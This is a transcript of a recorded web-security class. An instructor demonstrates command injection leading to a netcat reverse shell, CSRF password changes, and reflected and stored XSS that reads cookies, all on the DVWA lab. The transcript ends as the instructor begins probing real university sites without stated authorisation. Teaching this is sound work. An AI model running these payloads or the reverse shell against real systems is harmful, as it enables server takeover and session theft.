Yep. So server side language, client side language, and so today we are going to see the attacks, what kind of attack we can do. So we can do various sort of attacks. So as you can see, cookie poisoning, so we can steal the cookie, directory traversal attack, DOS attack, form tampering attack, SQL injection attack, cross-site scripting attack, CSRF, and security misconfiguration. So these are the threats of web applications in which we have already seen cookie poisoning and directory traversal attack. So we are going, and DOS attack also. So we are going to see like these three. So how to perform these attacks. So
Okay.
let's just first we are let me just open, wait a second. Yeah, let me check the IP. So uh, 192.168. Okay, 192.168 0.102, and let me reduce the security. Yep. So first we are going to see the command injection attack. So how to perform command injection. So whenever the web application, any website allows us to enter any CMD level command. So here as you can see, this is a input box where it is telling us, asking us to do a ping scan for free. So here using this, in this search box we can ping anything. So if I try to do let me do, so as you can see, it is going to ping google.com for me, and it is going to give me the ping result. So it is allowing me to enter any system level command, any CMD command on their server. So I, through this input box, I can enter any command, and that command will execute on this server, and that server will give me the output. So it is
Okay.
a very big, so if any developer, any website allows us to enter any system commands in their server, and if they are not properly blocking it, properly sanitizing our request, then what we can do, we can perform any command. We can just take their server, we can hijack their server, we can do anything. We can just completely take the access of their server, so on their system. So which server, where the server where the this website is being hosted, we can completely take over that. So how we are going to perform that. So it is, so if I do ls, whether it gives me output or not. So it is not giving me output. So usually what happens, if I do this and ls, so as you can see it is showing me. So this is used to just uh, so by using this I'm just ending up one statement and I'm using another. So as you can see, what I can do, I can do ping, and also with ping I am just stopping this command, and I am merging this command with this. So I am doing two different commands together.
Yes, sir.
So as you can see, it is giving me, first it will give me the ping result, and then it will give me the ls. So using this technique we can do two different commands. So it is built to do the ping, but with what we are doing, we are just blocking the ping by finishing the command, and then we are doing our own command. So let's see how to do that. So here is the script. Yep, this is the command injection. So what we are going to do, first we will do the ping, and after that ping, what we can do, we are going to use this command, netcat. So netcat is a tool which is used to do the reverse connection. So using this we can get a reverse connection from any other PC. So let's see how to use this. So first I'm going to open my terminal, and in my terminal what I'm going to do, I'm going to enter the command netcat. If we do netcat, okay, so let me do netcat -h. So you can see we get all the options which we can use. So what I'm going to use, I'm going to do netcat -l VVP and port number. So what L means? L means that on which port we have to listen, and L means that listening. So we are listening on our system for any reverse connection. So L means listening, and verbose will just give us the output in real time, and P is for port. So we are going to assign port number 4444. So we are listening on port 444. So this command means we are listening on this port number. So as you can see, listening on any, and whenever this PC receives any reverse connection on this port number, our we can connect to that PC. So currently I am listening on this PC, and now what we need to do, we need to use this. So netcat -e bin sh and attacker IP. So our IP and the port number, so which is 4444. So let us do this. So I'm just doing this, and this is the command. So I'm just closing this. So netcat -e /bin /sh and the attacker's IP. So 192. Okay, I have to check my IP. If I do if config and what's my IP, so 101. So yep, .0.101, and now I have to enter the port number, which is 444, and if I do submit, it is going to execute it. So if I see my terminal, it is showing me that connect. So connect to this. So my IP has been connected. So the PC has, I got the reverse connection on my PC. And if I do ls, you can see the menu. And if I do who am I, it is showing me. So if I go back, if I do ls, we get all these files. So now I can use any command, any terminal command. So I got the access on their server, and I can use any command. So currently I'm in this. I can do cd ... and if I do pwd, I'm in dvwa. I can do ls. I can see all these files. We can download any file using wget. We can upload any file. So we can upload any PHP shell. So like the shell we used, we created using vv. What we can do, we can upload any shell using vv. So we can create any shell and then we can upload, and we can get more access. So there are a lot of things we can do. So if any website allows you to perform any system level command, to like ping command or any command, mostly the coding websites. So what they do, they allow you to compile the code. So if you visit any website like Geeks for Geeks, or like any website where you can just put your code and you can just compile your code. So what they are doing, they are taking the code which you entering, and they will compile the code on their server, and then they will give you the output. And if they are not properly sanitizing your request, you can just get a reverse connection, or you can inject any malware, you can inject any backdoor on their server, and you can get the connection. So it's very risky to allow the system level access, like to allow any system level commands to the user. So this is how we do the command execution. And next, if we talk about CSRF, so what is CSRF? So let us see. So CSRF stands for cross-site request forgery. So this vulnerability is now almost dead. So previously it was like in the OWASP top 10. So Open Web Application Security Project. So OWASP previously it was in the OWASP top 10, but now it is out of OWASP top 10 because it's like this vulnerability has mostly been patched up by the newly websites. All the new websites have just fixed this vulnerability, but if there is any old website, you can still try to perform. So there are many old websites which allows this vulnerability. So these are the steps what we have to do. So let me open CSRF and let me change any password. So my current password is like for DVWA, my current password is password. So what I'm going to do, I'm going to change the password. So I'm going to do the 12345 6 and confirm 12345 6, and if I press enter, you can see I'm getting some output here in the URL. What I'm going to do, I'm going to do to the control view, I'm going to see the form. So where is the form? So here is the form. I'm gonna copy this form. I'm gonna open Notepad. I'm gonna paste this, and on this action where there is hash, what I'm going to do, I'm going to copy this whole link from HTTP. This whole link. Let me copy this. Yeah, copy this, and I'm going to paste that link in action, and I'm going to save this with the extension. So CSRF.html, we have to save this with the extension of .html. Going to save this on desktop, save, and let me just open it, double click it. As you can see, it is going to open this new page. So just look at the location. So this location is from the server, as you can see, 192.168. This is a web server, and this is file. So it is opening inside my file, inside my system, inside my storage. But what if I do, so previously what I do the password 12345 6, and now what I'm going to do, I'm going to do 0000000 6 times 0 0000000, and if I do change, what's going to happen, it's going to change the password. So as you can see, this is the new password, this is the confirm password. So previously, where was I the file opened inside this, but once we click on change the password, it redirected to the server, and it changes the password. So let us test it. Let me log out, and if I use my old password, so admin password, it won't login failed. If I do admin, and if I do 12345 6, let me see, login failed. And now if I do admin, and if I do 6 times 0, so 102030405060, it's going to log me in. So it's going to give me access. So with this file, we can able to change any password to the victim. So previously this vulnerability was like, with this vulnerability we can change any victim's password. So imagine you are I can able to change your Facebook password, your Instagram password using this vulnerability. But now what they do, because it wasn't asking for the it was just asking for where was CSRF, so yeah, it's just asking for a new password and confirm password. But what the developers have done now, if I increase it to high, you can able to see, previously it was just asking for new password, and now it will ask for current password, a new password, and then confirm new password. So previously it wasn't asking for current password, but now developers are implementing this option. So we have to also enter the current password, otherwise we cannot be able to change the password. So now this vulnerability has been patched up, but in a lot of web application you can still be able to find CSRF vulnerability. So this is what CSRF is about, and CSRF is not only about this password changing. I am just giving you the idea of how it works, but you can use this for like other things. So basically you can tamper any form with this. So if they are not completely sanitizing this, you can just press Ctrl U, you can copy the form and you can redirect that. You can try to play with the requests, so how they are handling the request. If they are handling the request insecurely, then there is CSR. And that was the CSRF. And let me tell you about the accesses. So there there are two types of accesses. So reflected accesses, stored accesses. So there is also one accesses called DOM based, but you won't be able to find. So what it does, DOM based, you able to find inside. It's like very difficult to find. So usually we refer as two types, so reflected and stored accesses. And DOM based is inside your document object model. So it is called document object model. So what DOM based does is, so whenever you open the source, so there is a hierarchy, so there is a tree like structure, so which the web page needs to follow. So there will be a proper structure and proper hierarchy. So through that we get all the things, so like in a proper tree structure. So the DOM based vulnerability exists inside this hierarchy, so it's difficult to find. So usually people like tell us that there are only two types, that they don't count DOM. Some people count DOM, some don't count, but but in reality there is three types of accesses, but the main is these two, so reflected and stored. So you are going to find this a lot in like most of the sites. You will find reflected accesses, and stored accesses is in a few websites, but if you found stored accesses, then you will got more bounty in this than this. So it will give you some less bounty than stored. So it's quite easy to find. If you do some, like if you know how to do it, you can easily find reflected accesses. So let me show you how to perform. So what is reflected accesses? So reflected accesses occurs inside the URL. So it will, reflected accesses will only affect a single URL. So for example, so we can try to perform accesses attack on any form, whether it's a search bar, whether it's a contact form, whether it's a login form, whether it's a sign up form. Whenever you see this type of this type of form, any type of form, we just try to attack. So currently if I do anything, it's going to tell me hello. So it is asking me to type my name. So what I'm going to do, I'm going to test for accesses attack. So I'm going to write a simple script. So let me show you what's that script is. So I'm going to type a malicious JavaScript code. So it's a simple code. So I'm just giving alert one. So if the accesses present in that application, I will get an alert. So let me do this. If I do script alert 1 and press enter, you'll see it alerts a pop-up, which means this link has a vulnerability. So if I copy this link and if I send to anybody, I can do some malicious activity with this. What I can do, I can steal anybody's cookie, and you saw what we can do with the cookie. We can steal someone's cookie and we can steal someone's session. So how to perform that? We can do, instead of this, we can do document.cookie, and it will show the cookie of the person who is executing inside his PC. So let me do this script. Alert document.cookie, and it's going to so if you send this to anybody and once he opens this one, it will show us the cookie. So as you can see, this is my cookie, and we can use this cookie with that cookie editor extension, and we can try to take over the victim's session. And it's just a simple cookie example. If you search on Google some advanced accesses payloads, you can see there is like a lot of things you can do. I'm just showing you some small thing what we can do. So in this list there is a txt file. I'm not going to open it. Let me. So this is also GitHub site. Let me open every file. So this is also a challenge type thing. So this is like huge list. So it's just for checking. I want to do some activity. So advanced periods. So this is used to bypass restrictions, and there are many codes through which we can use. So what it's going to do, currently it is just popping up. So whenever we try to do the command, it is just popping us the cookie, but there are scripts which can send you the email, and that email will contain the victim's cookie. So currently it is just popping up. So why? So currently it is just popping up. So let me search the script. There are scripts. So XSS script for stealing or cookies. So you can see this is the script which we can run, and it is going to send us the email. So document.cookie, and it is going to send us the email. So it's we have to do some PHP coding also in this. So it has like all the description how to steal cookies, and this website will also tell us step by step how to steal the cookie. So creating a cookie and stealing the cookie. So this is the command. So we have to make a server, and we will get the cookie on that website. So these are some tutorials which you can see, and there are a lot of attacks. If you can just search what things we can do with XSS. So you will find attack tutorials, like what type of attacks we can do. So you can just search them if you want. And let me tell you so this was the refracted. So refracted based accesses only happens at any particular link. So this attack will only work in this link. But if I open this stored accesses, so what stored accesses is going to do? Stored accesses is going to get stored inside a database. So whenever any person opens the page, the script is going to execute it. So currently, if I visit this refracted, it is not going to alert any pop-up because that link is gone. I have to specially craft that link. I have to specially type anything, craft the link, then I can able to see. So I have to send this link, and if whoever person opens this link, only that person get compromised. So if I just reload this, the script is gone. So refracted will only occurs at only one link. So we have to craft that link, and we have to send that. But in stored accesses. If we store any accesses, if we store, if we type any malicious JavaScript code and it got stored inside a database, then we doesn't need to send that link to anybody. Whenever any person visits that particular page, the script is going to get executed. So let us see how. So here this is a guest book, so they are asking us to, so this is like a typical comment section where we can give our name and we can give comment on any website or YouTube or anywhere. So what we can do, I'm typing hacker, this is the name, and I'm in comment I'm typing malicious code. So click on sign book and you are going to see it is giving me pop-up. So now if I go back to here, if I go back to home, so and once I go back to access store this page, it is going to execute it automatically. So I don't need to send this link to anybody. Whenever any person visits this page, this script is automatically going to execute. So this is more dangerous than refracted accesses. So imagine if there is a legitimate website where like 1,000 people or 10,000 people are visiting that website, and there is a stored access vulnerability, then you can like steal everyone's cookie. You can inject keylogger in their browser. You can do a lot of stuff with the stored accesses. So you don't need to spread it. So whenever you just need to type your code and it will get stored in the website database, and whenever any person visit that page, the script is automatically going to get executed. So this is why stored access is more dangerous. So this was the lab scenario, and let me tell you how to find accesses in a real world scenario. So if you want to do a bug hunting, or if you want to find any vulnerability inside a real application, so how to do that. So yep. Let me open. Okay, so let me just open bug suite. So, do you know how to use bug suite?
Yes, sir.
Yeah. So, let me configure it first. So, manual proxy, and let me open now already vulnerable website, because so let me my profile. And let me show you this. So CSChristUniversity.in, not this one, but GLA. Okay, let me open this. GLA.ac.in. Okay. Oh, okay. But we are performing it live, and there might be some chances that we got some like I'm going to stop the recording